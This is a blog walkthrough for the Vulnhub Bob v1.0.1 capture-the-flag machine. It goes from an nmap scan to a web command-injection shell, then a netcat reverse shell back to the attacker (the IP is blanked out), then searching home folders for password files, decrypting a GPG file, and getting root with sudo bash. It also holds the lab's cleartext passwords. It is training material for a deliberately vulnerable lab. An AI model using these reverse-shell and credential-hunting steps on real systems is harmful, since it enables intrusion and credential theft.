Vulnhub Bob v1.0.1 machine walkthrough / writeup

Vulnhub Bob v1.0.1 machine walkthrough / writeup

Vulnhub Bob v1.0.1 machine walkthrough writeup

Bob v1.0.1 machine is an interesting vulnhub OSCP like machines for a beginner level.

Download from Vulnhub

Techniques Learned:

– Scanning
– Enumeration
– GPG file decryption

1. Scanning

# nmap -A -p- - nmap aggressive scan vulnhub box bov v1.0.1

Open ports: HTTP port 80 and SSH service in non-standard port 25468

2. enumeration

As we saw from scanning phase, nmap scripts reveals robots.txt contents:

Let’s go through each of them and checkout, we found an interesting shell which allows command execution (notice the backticks).

echo `id`

So, we can use it to get a shell!

3. Get a reverse shell

Attacker: run a reverse shell handler using netcat listener:

# nc -nlvp 4444

on the web shell enter the following and press submit (notice the backticks):

echo `nc 4444 -e /bin/bash`

where attacker machine IP is, change it with your IP. setup netcat reverse shell listener

Good, we got a shell as www-data user, but needs to be more stable, one way to do that is using python pty module to spawn an interactive shell:

python -c “import pty;pty.spawn(‘/bin/bash’)”

Now we have a stable tty shell, lets enumerate to get a higher privilege shell.

4. Escalate current privileges

There are many ways for enumeration to find a path for privilege escalation including automated tools like, but I will use a semi manual approach here as it is an easy box.

Let’s check users home folders for interesting files:
$ cd /home
$ find . -name “*.txt” -type f 2>/dev/null
$ cat ./elliot/theadminisdumb.txt

Read through till you notice that he said he changed his password to theadminisdumb !! elliot password - vulnhub bob v1.0.1 machine
So elliot password: theadminisdumb

$ find . -name “*.html” -type f 2>/dev/null
$ cat ./bob/.old_passwordfile.html

Found 2 users credentials:


Now we have three users credentials:

Switch to any user of them:

$ su elliot
Password: theadminisdumb

Enumerating didn’t get something useful, It seems that the user bob is the one we should seek for.

$ cd /home
$ find . -name “*.gpg” -type f 2>/dev/null

We have and encrypted login file for bob user, we may need a key to decrypt it, keep enumeration and looking for interesting files.

$ find . -name “*.sh” -type f 2>/dev/null

OR keep browsing in directories:

found: in /home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here/

$ cat

echo “-= Notes =-”
echo “Harry Potter is my faviorite”
echo “Are you the real me?”
echo “Right, I’m ordering pizza this is going nowhere”
echo “People just don’t get me”
echo “Ohhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh ”
echo “Cucumber”
echo “Rest now your eyes are sleepy”
echo “Are you gonna stop reading this yet?”
echo “Time to fix the server”
echo “Everyone is annoying”
echo “Sticky notes gotta buy em”

*Notice the First capital letters in every sentence which results in that word HARPOCRATES [maybe that is the key!!]

5. Decrypt gpg file - vulnhub bob v1.0.1 gpg decryption

$ gpg –batch –passphrase HARPOCRATES -d login.txt.gpg
gpg: AES encrypted data
gpg: encrypted with 1 passphrase

!Now we got bob’s password

6. Root the machine - vulnhub bob v1.0.1 root

Switch to user bob:

$ su bob
Password: b0bcat_

Check for what bob can run as root (sudo privileges):

$ sudo -l
[sudo] password for bob: b0bcat_

User bob may run the following commands on Milburg-High:

Get a bash shell as root:

$ sudo bash
# whoami

Capture The Flag:

# cat /flag.txt


Comments are closed.